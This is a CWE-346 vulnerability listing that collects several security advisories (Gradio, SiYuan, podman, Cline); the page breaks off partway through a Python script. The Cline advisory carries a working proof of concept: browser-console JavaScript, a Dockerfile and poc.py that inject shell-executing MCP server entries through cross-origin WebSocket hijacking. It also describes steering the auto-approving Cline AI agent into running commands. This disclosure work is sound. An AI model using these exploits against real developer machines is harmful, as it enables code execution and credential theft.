Common Weakness Enumeration

CWE-346

Allowed-with-Review

Origin Validation Error

Abstraction: Class · Status: Draft

The product does not properly verify that the source of data or communication is valid.

1080 vulnerabilities reference this CWE, most recent first.

GHSA-3C67-5HWX-F6WX

Vulnerability from github – Published: 2024-10-10 21:20 – Updated: 2025-01-21 17:57
VLAI
Summary
Gradios's CORS origin validation is not performed when the request has a cookie
Details

Impact

What kind of vulnerability is it? Who is impacted?

This vulnerability is related to CORS origin validation, where the Gradio server fails to validate the request origin when a cookie is present. This allows an attacker’s website to make unauthorized requests to a local Gradio server. Potentially, attackers can upload files, steal authentication tokens, and access user data if the victim visits a malicious website while logged into Gradio. This impacts users who have deployed Gradio locally and use basic authentication.

Patches

Yes, please upgrade to gradio>=4.44 to address this issue.

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

As a workaround, users can manually enforce stricter CORS origin validation by modifying the CustomCORSMiddleware class in their local Gradio server code. Specifically, they can bypass the condition that skips CORS validation for requests containing cookies to prevent potential exploitation.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "gradio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.44.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-47084"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285",
      "CWE-346"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-10-10T21:20:06Z",
    "nvd_published_at": "2024-10-10T22:15:10Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n**What kind of vulnerability is it? Who is impacted?**\n\nThis vulnerability is related to **CORS origin validation**, where the Gradio server fails to validate the request origin when a cookie is present. This allows an attacker\u2019s website to make unauthorized requests to a local Gradio server. Potentially, attackers can upload files, steal authentication tokens, and access user data if the victim visits a malicious website while logged into Gradio. This impacts users who have deployed Gradio locally and use basic authentication.\n\n### Patches\nYes, please upgrade to `gradio\u003e=4.44` to address this issue.\n\n### Workarounds\n**Is there a way for users to fix or remediate the vulnerability without upgrading?**\n\nAs a workaround, users can manually enforce stricter CORS origin validation by modifying the `CustomCORSMiddleware` class in their local Gradio server code. Specifically, they can bypass the condition that skips CORS validation for requests containing cookies to prevent potential exploitation.\n\n",
  "id": "GHSA-3c67-5hwx-f6wx",
  "modified": "2025-01-21T17:57:09Z",
  "published": "2024-10-10T21:20:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-3c67-5hwx-f6wx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47084"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gradio-app/gradio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gradio/PYSEC-2024-196.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Gradios\u0027s CORS origin validation is not performed when the request has a cookie"
}

GHSA-3CC2-H3V6-RQPQ

Vulnerability from github – Published: 2026-10-02 22:46 – Updated: 2026-10-02 22:46
VLAI
Summary
SiYuan: Cross-Site WebSocket Hijacking on the admin-only network proxy endpoint (`/ws/network/proxy`) via explicit `CheckOrigin: true` bypass
Details

High

Package

gomod github.com/siyuan-note/siyuan/kernel

Affected versions

3.7.3

Patched versions

(none yet — leave blank until a fix is released)

Description

Summary

/ws/network/proxy is an admin-only WebSocket forward-proxy endpoint (target URL and headers fully attacker-specifiable via query parameters). Its websocket.Upgrader explicitly overrides CheckOrigin to unconditionally return true — disabling the origin validation that the gorilla/websocket library otherwise enforces by default. WebSocket handshake requests are not subject to CORS preflight at all (unlike fetch/XHR), so origin validation for WebSocket endpoints has to be done deliberately by the server; here it has been deliberately turned off instead. Combined with the endpoint's own query-parameter-driven proxy target, this is a textbook Cross-Site WebSocket Hijacking (CSWSH) primitive on a capability that amounts to an authenticated network pivot through the SiYuan kernel process.

Details

// kernel/api/network.go:501
upgrader := websocket.Upgrader{
    CheckOrigin: func(r *http.Request) bool { return true },
}
clientConn, upgradeErr := upgrader.Upgrade(c.Writer, c.Request, upgradeHeaders)

Route registration (admin-role-gated):

// kernel/api/router.go:614
ginServer.Handle("GET", "/ws/network/proxy", model.CheckAuth, model.CheckAdminRole, wsProxy)

The proxy target is fully attacker-controllable via query parameters, decoded and dialed directly:

// kernel/api/network.go:348
func parseForwardProxyParams(c *gin.Context) (parsedURL *url.URL, headers *http.Header, timeout time.Duration, err error) {
    uParam := c.Query("u")
    ...
    uBytes, decErr := base64.RawURLEncoding.DecodeString(uParam)
    ...
    parsedURL, err = url.ParseRequestURI(string(uBytes))
    ...
    hParam := c.Query("h")   // optional forwarded headers, also base64-encoded

A malicious webpage can construct, entirely from JavaScript with no special access:

new WebSocket("ws://127.0.0.1:6806/ws/network/proxy?u=" + base64url(attackerChosenTargetURL));

WebSocket handshake requests are GET requests carrying ambient cookies exactly like any other cross-site navigation, and are not covered by CORS preflight protections at all, this is a distinct attack surface from ordinary fetch/XHR-based CSRF, and easy to overlook precisely because the usual CORS mental model doesn't apply to it. Whether this is currently exploitable in a given browser depends on the same session-cookie SameSite configuration already covered by a separate report on this repository (no explicit SameSite is set on the session cookie), but even where that provides incidental protection today, the explicit CheckOrigin: func(r *http.Request) bool { return true } override removes a defense-in-depth layer that would otherwise exist automatically from the WebSocket library's own safe default, and is worth fixing independently of the cookie-attribute question.

Impact

If reachable (dependent on browser/cookie-attribute behavior at time of exploitation, as above), a malicious website visited by a user with an active, admin-privileged SiYuan session could open a WebSocket connection to this endpoint and direct the SiYuan kernel process to proxy arbitrary network traffic to an attacker-chosen target, effectively an authenticated SSRF/network-pivot primitive, using the victim's own machine and any network position it has (e.g., internal/localhost-only services on the victim's LAN that aren't reachable from the public internet), entirely via a drive-by visit to an unrelated website while SiYuan happens to be running.

PoC

No live browser PoC was run for this report, this is a code-level confirmation that the CheckOrigin override exists and unconditionally returns true, combined with tracing the fully attacker-controlled proxy-target construction. I also checked whether the other WebSocket-adjacent endpoints (/ws/plugin/rpc, /ws/broadcast) share this issue: they use a different WebSocket library (gws, not gorilla/websocket) with a different upgrade code path I have not independently verified for its own origin-checking defaults, flagging this as worth a follow-up check by your team rather than claiming it applies there too.

## Affected products

| Field | Value |
|---|---|
| Ecosystem | **Go** |
| Package name | `github.com/siyuan-note/siyuan/kernel` |
| Affected versions | `<= 3.7.3` (confirmed present in 3.7.3; maintainers should confirm lower bound) |
| Patched versions | *(none yet — leave blank until a fix is released)* |

## Severity

| Field | Value |
|---|---|
| Vector string | `CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:N/A:N` |
| Score | **5.5 (Medium)**, reflecting that real-world exploitability depends on the co-occurring session-cookie `SameSite` question (also separately reported) and requires a victim with an active admin session to visit an attacker-controlled page (`AC:H`, `UI:R`); I'd expect this to be scored higher by your team if you determine the cookie/browser-behavior precondition is reliably met, since the underlying capability (network pivot through the kernel process) is significant. |

## Weaknesses (CWE)

- **CWE-346** — Origin Validation Error (primary — this is the textbook CWE for CSWSH)
- **CWE-352** — Cross-Site Request Forgery (the broader category this specific WebSocket variant falls under)
- **CWE-918** — Server-Side Request Forgery (secondary — the resulting capability once a connection is hijacked)
-

Suggested Fix

Replace CheckOrigin: func(r *http.Request) bool { return true } with a real check — validate the Origin header against the expected local/loopback origin (or the configured workspace's own address), mirroring how IsLoopbackCallback-style validation is already done correctly elsewhere in this codebase (e.g. the MCP OAuth client's loopback-callback check). Also worth auditing the gws-based WebSocket endpoints (/ws/plugin/rpc, /ws/broadcast) for their own origin-validation defaults, since I did not verify those independently.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/siyuan-note/siyuan/kernel"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260803045322-cb67e0b4fab5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-74802"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-346",
      "CWE-352",
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-10-02T22:46:18Z",
    "nvd_published_at": null,
    "severity": "LOW"
  },
  "details": "**High**\n\n## Package\ngomod `github.com/siyuan-note/siyuan/kernel`\n\n## Affected versions\n3.7.3\n\n## Patched versions\n*(none yet \u2014 leave blank until a fix is released)*\n\n## Description\n\n### Summary\n`/ws/network/proxy` is an admin-only WebSocket forward-proxy endpoint (target URL and headers fully attacker-specifiable via query parameters). Its `websocket.Upgrader` explicitly overrides `CheckOrigin` to unconditionally return `true` \u2014 disabling the origin validation that the `gorilla/websocket` library otherwise enforces **by default**. WebSocket handshake requests are not subject to CORS preflight at all (unlike `fetch`/XHR), so origin validation for WebSocket endpoints has to be done deliberately by the server; here it has been deliberately turned *off* instead. Combined with the endpoint\u0027s own query-parameter-driven proxy target, this is a textbook Cross-Site WebSocket Hijacking (CSWSH) primitive on a capability that amounts to an authenticated network pivot through the SiYuan kernel process.\n\n### Details\n\n```go\n// kernel/api/network.go:501\nupgrader := websocket.Upgrader{\n    CheckOrigin: func(r *http.Request) bool { return true },\n}\nclientConn, upgradeErr := upgrader.Upgrade(c.Writer, c.Request, upgradeHeaders)\n```\n\nRoute registration (admin-role-gated):\n```go\n// kernel/api/router.go:614\nginServer.Handle(\"GET\", \"/ws/network/proxy\", model.CheckAuth, model.CheckAdminRole, wsProxy)\n```\n\nThe proxy target is fully attacker-controllable via query parameters, decoded and dialed directly:\n```go\n// kernel/api/network.go:348\nfunc parseForwardProxyParams(c *gin.Context) (parsedURL *url.URL, headers *http.Header, timeout time.Duration, err error) {\n    uParam := c.Query(\"u\")\n    ...\n    uBytes, decErr := base64.RawURLEncoding.DecodeString(uParam)\n    ...\n    parsedURL, err = url.ParseRequestURI(string(uBytes))\n    ...\n    hParam := c.Query(\"h\")   // optional forwarded headers, also base64-encoded\n```\n\nA malicious webpage can construct, entirely from JavaScript with no special access:\n```js\nnew WebSocket(\"ws://127.0.0.1:6806/ws/network/proxy?u=\" + base64url(attackerChosenTargetURL));\n```\nWebSocket handshake requests are GET requests carrying ambient cookies exactly like any other cross-site navigation, and are not covered by CORS preflight protections at all, this is a distinct attack surface from ordinary `fetch`/XHR-based CSRF, and easy to overlook precisely because the usual CORS mental model doesn\u0027t apply to it. Whether this is currently exploitable in a given browser depends on the same session-cookie `SameSite` configuration already covered by a separate report on this repository (no explicit `SameSite` is set on the session cookie), but even where that provides incidental protection today, the explicit `CheckOrigin: func(r *http.Request) bool { return true }` override removes a defense-in-depth layer that would otherwise exist automatically from the WebSocket library\u0027s own safe default, and is worth fixing independently of the cookie-attribute question.\n\n### Impact\nIf reachable (dependent on browser/cookie-attribute behavior at time of exploitation, as above), a malicious website visited by a user with an active, admin-privileged SiYuan session could open a WebSocket connection to this endpoint and direct the SiYuan kernel process to proxy arbitrary network traffic to an attacker-chosen target, effectively an authenticated SSRF/network-pivot primitive, using the victim\u0027s own machine and any network position it has (e.g., internal/localhost-only services on the victim\u0027s LAN that aren\u0027t reachable from the public internet), entirely via a drive-by visit to an unrelated website while SiYuan happens to be running.\n\n### PoC\nNo live browser PoC was run for this report, this is a code-level confirmation that the `CheckOrigin` override exists and unconditionally returns `true`, combined with tracing the fully attacker-controlled proxy-target construction. I also checked whether the other WebSocket-adjacent endpoints (`/ws/plugin/rpc`, `/ws/broadcast`) share this issue: they use a different WebSocket library (`gws`, not `gorilla/websocket`) with a different upgrade code path I have not independently verified for its own origin-checking defaults, flagging this as worth a follow-up check by your team rather than claiming it applies there too.\n\n```\n## Affected products\n\n| Field | Value |\n|---|---|\n| Ecosystem | **Go** |\n| Package name | `github.com/siyuan-note/siyuan/kernel` |\n| Affected versions | `\u003c= 3.7.3` (confirmed present in 3.7.3; maintainers should confirm lower bound) |\n| Patched versions | *(none yet \u2014 leave blank until a fix is released)* |\n\n## Severity\n\n| Field | Value |\n|---|---|\n| Vector string | `CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:N/A:N` |\n| Score | **5.5 (Medium)**, reflecting that real-world exploitability depends on the co-occurring session-cookie `SameSite` question (also separately reported) and requires a victim with an active admin session to visit an attacker-controlled page (`AC:H`, `UI:R`); I\u0027d expect this to be scored higher by your team if you determine the cookie/browser-behavior precondition is reliably met, since the underlying capability (network pivot through the kernel process) is significant. |\n\n## Weaknesses (CWE)\n\n- **CWE-346** \u2014 Origin Validation Error (primary \u2014 this is the textbook CWE for CSWSH)\n- **CWE-352** \u2014 Cross-Site Request Forgery (the broader category this specific WebSocket variant falls under)\n- **CWE-918** \u2014 Server-Side Request Forgery (secondary \u2014 the resulting capability once a connection is hijacked)\n-\n```\n\n## Suggested Fix\nReplace `CheckOrigin: func(r *http.Request) bool { return true }` with a real check \u2014 validate the `Origin` header against the expected local/loopback origin (or the configured workspace\u0027s own address), mirroring how `IsLoopbackCallback`-style validation is already done correctly elsewhere in this codebase (e.g. the MCP OAuth client\u0027s loopback-callback check). Also worth auditing the `gws`-based WebSocket endpoints (`/ws/plugin/rpc`, `/ws/broadcast`) for their own origin-validation defaults, since I did not verify those independently.",
  "id": "GHSA-3cc2-h3v6-rqpq",
  "modified": "2026-10-02T22:46:18Z",
  "published": "2026-10-02T22:46:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-3cc2-h3v6-rqpq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-74802"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/commit/cb67e0b4fab57c9c5f458c1fd0df5ecf4417b696"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/siyuan-note/siyuan"
    },
    {
      "type": "WEB",
      "url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.8.0"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/siyuan-cross-site-websocket-hijacking-via-network-proxy"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "SiYuan: Cross-Site WebSocket Hijacking on the admin-only network proxy endpoint (`/ws/network/proxy`) via explicit `CheckOrigin: true` bypass"
}

GHSA-3CF2-X423-X582

Vulnerability from github – Published: 2022-01-06 21:12 – Updated: 2022-02-09 18:28
VLAI
Summary
Exposure of Sensitive Information to an Unauthorized Actor and Origin Validation Error in podman
Details

A flaw was found in podman. The podman machine function (used to create and manage Podman virtual machine containing a Podman process) spawns a gvproxy process on the host system. The gvproxy API is accessible on port 7777 on all IP addresses on the host. If that port is open on the host's firewall, an attacker can potentially use the gvproxy API to forward ports on the host to ports in the VM, making private services on the VM accessible to the network. This issue could be also used to interrupt the host's services by forwarding all ports to the VM.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/containers/podman/v3"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.4.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-4024"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-346"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-01-05T17:44:04Z",
    "nvd_published_at": "2021-12-23T20:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A flaw was found in podman. The `podman machine` function (used to create and manage Podman virtual machine containing a Podman process) spawns a `gvproxy` process on the host system. The `gvproxy` API is accessible on port 7777 on all IP addresses on the host. If that port is open on the host\u0027s firewall, an attacker can potentially use the `gvproxy` API to forward ports on the host to ports in the VM, making private services on the VM accessible to the network. This issue could be also used to interrupt the host\u0027s services by forwarding all ports to the VM.",
  "id": "GHSA-3cf2-x423-x582",
  "modified": "2022-02-09T18:28:05Z",
  "published": "2022-01-06T21:12:50Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4024"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2026675,"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/containers/podman"
    },
    {
      "type": "WEB",
      "url": "https://github.com/containers/podman/releases/tag/v3.4.3"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QFFVJ6S3ZRMPDYB7KYAWEMDHXFZYQPU3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Exposure of Sensitive Information to an Unauthorized Actor and Origin Validation Error in podman"
}

GHSA-3CJ3-HQCR-G934

Vulnerability from github – Published: 2026-09-24 19:48 – Updated: 2026-09-24 19:48
VLAI
Summary
Cline: Cross-Origin WebSocket Hijacking in Cline Hub Dashboard (`/browser` endpoint)
Details

Summary

The Cline Hub dashboard server (@cline/cline-hub), launched via the cline dashboard CLI command, accepts WebSocket connections on the /browser endpoint without validating the HTTP Origin header. When ROOM_SECRET is not set—the default for local (127.0.0.1) binds—isAuthorizedBrowserRequest() returns true unconditionally, allowing any website a developer visits to open a cross-origin WebSocket to ws://127.0.0.1:8787/browser. An attacker-controlled page can then send desktopCommand frames to read workspace/session state, mutate MCP and provider settings, and—because dashboard sessions default to autoApprove: true for all tools—trigger arbitrary command execution when a provider/model is configured. Dynamically confirmed: an upsert_mcp_server frame injected a malicious stdio MCP server entry into the victim's Cline settings file with ok: true response.

Details

The vulnerable code path spans multiple files in the apps/cline-hub workspace.

No secret by default (local bind)

apps/cline-hub/src/options.ts:54–57 converts an empty ROOM_SECRET environment variable to undefined:

// apps/cline-hub/src/options.ts:54
function normalizeRoomSecret(value: string | undefined): string | undefined {
    const secret = value?.trim();
    return secret ? secret : undefined;
}

apps/cline-hub/src/options.ts:67–85 allows the local default host (127.0.0.1) to start without a secret, so roomSecret remains undefined in the default configuration.

Authorization bypass — Origin not checked

apps/cline-hub/src/server.ts:61–64 short-circuits all authorization when roomSecret is undefined, and performs no Origin header check at any point:

// apps/cline-hub/src/server.ts:61
function isAuthorizedBrowserRequest(url: URL): boolean {
    if (!roomSecret) return true;
    return url.searchParams.get("roomSecret") === roomSecret;
}

WebSocket upgrade without Origin validation

apps/cline-hub/src/server.ts:86–97 upgrades any request to /browser without inspecting the Origin header:

// apps/cline-hub/src/server.ts:86
if (url.pathname === "/browser") {
    if (!isAuthorizedBrowserRequest(url)) {
        return createJsonResponse({ error: "invalid_room_secret" }, 401);
    }
    if (server.upgrade(req, { data })) return undefined;
}

Browsers enforce the Same-Origin Policy for fetch/XHR but not for WebSocket connections—they always include the Origin header but leave enforcement to the server. Because the server ignores Origin, any cross-origin JavaScript can connect.

Auto-approve tool policy for dashboard sessions

apps/cline-hub/src/server/sessions.ts:129–133 sets the default tool policy to auto-approve all tools for new dashboard sessions:

// apps/cline-hub/src/server/sessions.ts:129
toolPolicies:
    options?.autoApproveTools === false
        ? { "*": { autoApprove: false } }
        : { "*": { autoApprove: true } },

MCP settings write sink

apps/cline-hub/src/server/desktop-commands.ts:180–185 processes upsert_mcp_server commands without additional authorization. apps/cline-hub/src/server/mcp.ts:101–136 writes arbitrary stdio command entries to $CLINE_DATA_DIR/settings/cline_mcp_settings.json, which Cline executes when the MCP server is next activated.

PoC

Prerequisites

  • cline version 3.0.24 installed globally
  • A browser (or any WebSocket client) running on the same machine as the victim

Setup

npm i -g cline@3.0.24
export CLINE_DATA_DIR="$(mktemp -d)"
cline dashboard --no-open
# Default: HOST=127.0.0.1, PORT=8787, ROOM_SECRET unset

Exploit (browser console on any cross-origin page)

Open any non-Cline website in the browser and paste the following into the DevTools console while the dashboard is running:

const ws = new WebSocket("ws://127.0.0.1:8787/browser");
ws.onopen = () => {
  ws.send(JSON.stringify({
    type: "desktopCommand",
    id: "poc-mcp-write",
    command: "upsert_mcp_server",
    args: {
      input: {
        name: "poc-cswsh",
        transportType: "stdio",
        command: "sh",
        args: ["-c", "touch /tmp/cline-hub-cswsh-poc"],
        disabled: false
      }
    }
  }));
};
ws.onmessage = (e) => console.log(e.data);

Expected result

  • The WebSocket connection is accepted without any Origin rejection.
  • The server responds with {"type":"desktopCommandResult","id":"poc-mcp-write","ok":true}.
  • $CLINE_DATA_DIR/settings/cline_mcp_settings.json contains the injected poc-cswsh stdio MCP server entry pointing to sh -c ....
  • On the next MCP connection by Cline, the injected shell command executes under the victim's user account.

Docker-based dynamic reproduction

docker build -f vuln-001/Dockerfile -t cswsh-poc-vuln001 /path/to/npmAI_11_cline__cline/
docker run --rm cswsh-poc-vuln001
# Expected final output: [RESULT] PASS — Cross-origin WebSocket hijacking CONFIRMED

The Python PoC (poc.py) connects to ws://127.0.0.1:8787/browser with Origin: http://evil.attacker.example.com, sends the upsert_mcp_server frame, and confirms both the ok: true response and the presence of the injected MCP entry in the settings file. All three assertions passed in dynamic testing.

RCE variant (requires provider/model configured)

If the victim has a working AI provider configured, send a type: "send" frame with config.autoApproveTools: true and a task prompt that instructs Cline to execute a shell command. Dashboard-created sessions default to autoApprove: true for all tools, so no confirmation prompt is shown.

Impact

Any malicious website visited by a developer running cline dashboard on the default local configuration can:

  1. Read session metadata, workspace state, and provider configuration exposed through the WebSocket protocol.
  2. Write arbitrary MCP server entries (including stdio entries with arbitrary shell commands) to cline_mcp_settings.json, achieving persistent code execution when Cline activates the MCP server.
  3. Control active Cline agent sessions—with all tools auto-approved—to perform file read/write, command execution, and network operations on behalf of the victim.
  4. Exfiltrate credentials or API keys available in the developer's environment or Cline provider configuration.

The attack requires only that the victim has the dashboard running (a one-command default-on workflow feature) and visits a single attacker-controlled page. No authentication, user interaction beyond the page visit, or knowledge of any secret is required. The impact is scoped to the developer's local machine and Cline data directory, but lateral movement and supply chain attacks are achievable via injected MCP servers or agent-executed commands.

Reproduction artifacts

Dockerfile

# VULN-001: Cross-Origin WebSocket Hijacking (CSWSH) in Cline Hub Dashboard
# CVE candidate: CWE-346 (Origin Validation Error)
#
# This Dockerfile builds a container that:
#  1. Installs the Bun runtime and SDK workspace dependencies
#  2. Builds the @cline/shared, @cline/llms, @cline/agents, @cline/core packages
#  3. Installs Python 3 + websockets library for the PoC script
#  4. Launches the cline-hub dashboard server (no ROOM_SECRET → any Origin accepted)
#  5. Runs poc.py which connects with a cross-origin Origin header and
#     injects an arbitrary MCP server entry into the user's settings file

FROM oven/bun:1.3

# ── System packages ──────────────────────────────────────────────────────────
RUN apt-get update && \
    apt-get install -y --no-install-recommends \
        python3 python3-pip curl && \
    rm -rf /var/lib/apt/lists/*

# Install Python websockets library for the PoC
RUN pip3 install websockets --break-system-packages

# ── Copy source ───────────────────────────────────────────────────────────────
WORKDIR /app

# Copy the cloned repository (build context = npmAI_11_cline__cline/)
COPY repo/ ./repo/

# Copy the PoC script
COPY vuln-001/poc.py ./poc.py

# ── Install workspace dependencies ────────────────────────────────────────────
WORKDIR /app/repo
RUN bun install

# ── Build SDK packages (required: dist/ exports for @cline/core et al.) ──────
# Build order: shared → llms → agents → core
RUN bun run --cwd sdk/packages/shared build 2>&1 | tail -3
RUN bun run --cwd sdk/packages/llms    build 2>&1 | tail -3
RUN bun run --cwd sdk/packages/agents  build 2>&1 | tail -3
RUN bun run --cwd sdk/packages/core    build 2>&1 | tail -3

# ── Runtime environment ───────────────────────────────────────────────────────
ENV CLINE_DATA_DIR=/tmp/cline-poc-data
ENV WORKSPACE_ROOT=/tmp/workspace
ENV CLINE_NO_INTERACTIVE=1

RUN mkdir -p /tmp/cline-poc-data/settings /tmp/workspace

WORKDIR /app

# poc.py starts the dashboard server internally, runs the exploit, and exits
CMD ["python3", "/app/poc.py"]

poc.py

#!/usr/bin/env python3
"""
VULN-001: Cross-Origin WebSocket Hijacking (CSWSH) in Cline Hub Dashboard

Vulnerability path:
  apps/cline-hub/src/server.ts:61-64  isAuthorizedBrowserRequest() returns
    true unconditionally when roomSecret is undefined (no ROOM_SECRET env var).
  apps/cline-hub/src/server.ts:86-97  /browser WebSocket upgrade: no Origin
    header validation is performed before accepting the connection.

Attack scenario:
  A developer is running `cline dashboard` on localhost:8787 (default, no secret).
  Any website they visit can open a cross-origin WebSocket to the dashboard,
  send a desktopCommand/upsert_mcp_server frame, and inject an arbitrary stdio
  MCP server entry into the user's Cline settings file.

PoC steps:
  1. Start the cline-hub dashboard server (no ROOM_SECRET → roomSecret=undefined).
  2. Connect to ws://127.0.0.1:8787/browser with Origin: http://evil.attacker.example.com
     (simulating a cross-origin browser page).
  3. Send a desktopCommand frame: upsert_mcp_server with a marker command.
  4. Assert the server returns desktopCommandResult { ok: true }.
  5. Read $CLINE_DATA_DIR/settings/cline_mcp_settings.json and confirm the
     injected MCP server entry is present.

Usage (inside Docker container):
  python3 /app/poc.py
"""

import asyncio
import json
import os
import subprocess
import sys
import time
import urllib.request
import urllib.error

# ---------------------------------------------------------------------------
# Configuration
# ---------------------------------------------------------------------------
REPO_ROOT      = "/app/repo"
SERVER_HOST    = "127.0.0.1"
SERVER_PORT    = 8787
SERVER_HTTP    = f"http://{SERVER_HOST}:{SERVER_PORT}"
SERVER_WS      = f"ws://{SERVER_HOST}:{SERVER_PORT}/browser"

# Simulated attacker origin — a cross-origin value that a real browser would
# send when JavaScript on http://evil.attacker.example.com opens the WebSocket.
ATTACK_ORIGIN  = "http://evil.attacker.example.com"

# Injected MCP server payload
MCP_NAME       = "poc-cswsh-marker"
MCP_CMD        = "sh"
MCP_ARGS       = ["-c", "id > /tmp/cline-hub-cswsh-poc.txt && echo CSWSH_SUCCESS"]

CLINE_DATA_DIR = os.environ.get("CLINE_DATA_DIR", "/tmp/cline-poc-data")
MCP_SETTINGS   = os.path.join(CLINE_DATA_DIR, "settings", "cline_mcp_settings.json")

# ---------------------------------------------------------------------------
# Server startup helpers
# ---------------------------------------------------------------------------

def start_server() -> subprocess.Popen:
    """Spawn the cline-hub dashboard server as a background process."""
    print("[*] Starting cline-hub dashboard server (no ROOM_SECRET) ...")
    env = {
        **os.environ,
        "CLINE_DATA_DIR": CLINE_DATA_DIR,
        "WORKSPACE_ROOT": os.environ.get("WORKSPACE_ROOT", "/tmp/workspace"),
        "CLINE_NO_INTERACTIVE": "1",
    }
    proc = subprocess.Popen(
        [
            "bun",
            "--conditions=development",
            "run",
            "apps/cline-hub/src/server.ts",
        ],
        cwd=REPO_ROOT,
        env=env,
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        text=True,
    )
    print(f"[*] Server PID: {proc.pid}")
    return proc


def wait_for_server(timeout_secs: int = 120) -> bool:
    """Poll the /health endpoint until the server responds or timeout expires."""
    print(f"[*] Waiting for server at {SERVER_HTTP}/health (timeout={timeout_secs}s) ...")
    deadline = time.time() + timeout_secs
    last_err = ""
    while time.time() < deadline:
        try:
            with urllib.request.urlopen(
                f"{SERVER_HTTP}/health", timeout=3
            ) as resp:
                if resp.status == 200:
                    data = json.loads(resp.read())
                    print(f"[+] Server is up. Health: {json.dumps(data)[:200]}")
                    return True
        except Exception as exc:
            last_err = str(exc)
        time.sleep(2)
    print(f"[-] Server did not become ready within {timeout_secs}s. Last error: {last_err}")
    return False


def drain_server_output(proc: subprocess.Popen, lines: int = 30) -> str:
    """Collect recent server stdout/stderr for diagnostic purposes."""
    collected = []
    try:
        import select
        while True:
            r, _, _ = select.select([proc.stdout], [], [], 0)
            if not r:
                break
            line = proc.stdout.readline()
            if not line:
                break
            collected.append(line.rstrip())
    except Exception:
        pass
    return "\n".join(collected[-lines:])

# ---------------------------------------------------------------------------
# WebSocket exploit
# ---------------------------------------------------------------------------

async def run_exploit() -> dict:
    """
    Connect to the dashboard WebSocket with a cross-origin Origin header,
    send upsert_mcp_server, and return a result dict with evidence.
    """
    # Import websockets — handle both legacy (<12) and current (>=12) API
    try:
        from websockets.asyncio.client import connect as ws_connect
    except ImportError:
        from websockets import connect as ws_connect  # type: ignore[no-redef]

    result = {
        "connect_accepted": False,
        "command_ok": False,
        "mcp_settings_written": False,
        "response_raw": "",
        "mcp_settings_content": "",
        "error": "",
    }

    print(f"[*] Connecting to {SERVER_WS}")
    print(f"[*] Using cross-origin header: Origin: {ATTACK_ORIGIN}")

    try:
        async with ws_connect(
            SERVER_WS,
            additional_headers={"Origin": ATTACK_ORIGIN},
            open_timeout=15,
        ) as ws:
            result["connect_accepted"] = True
            print(f"[+] WebSocket connection ACCEPTED with Origin: {ATTACK_ORIGIN}")
            print("[*] Server performed no Origin validation — CSWSH confirmed at connection level")

            # Build the attack frame: inject an arbitrary stdio MCP server
            attack_frame = {
                "type": "desktopCommand",
                "id": "poc-cswsh-001",
                "command": "upsert_mcp_server",
                "args": {
                    "input": {
                        "name": MCP_NAME,
                        "transportType": "stdio",
                        "command": MCP_CMD,
                        "args": MCP_ARGS,
                        "disabled": False,
                    }
                },
            }

            print(f"[*] Sending desktopCommand: upsert_mcp_server → {MCP_NAME}")
            await ws.send(json.dumps(attack_frame))

            # Collect responses until we see our desktopCommandResult
            deadline = asyncio.get_event_loop().time() + 30
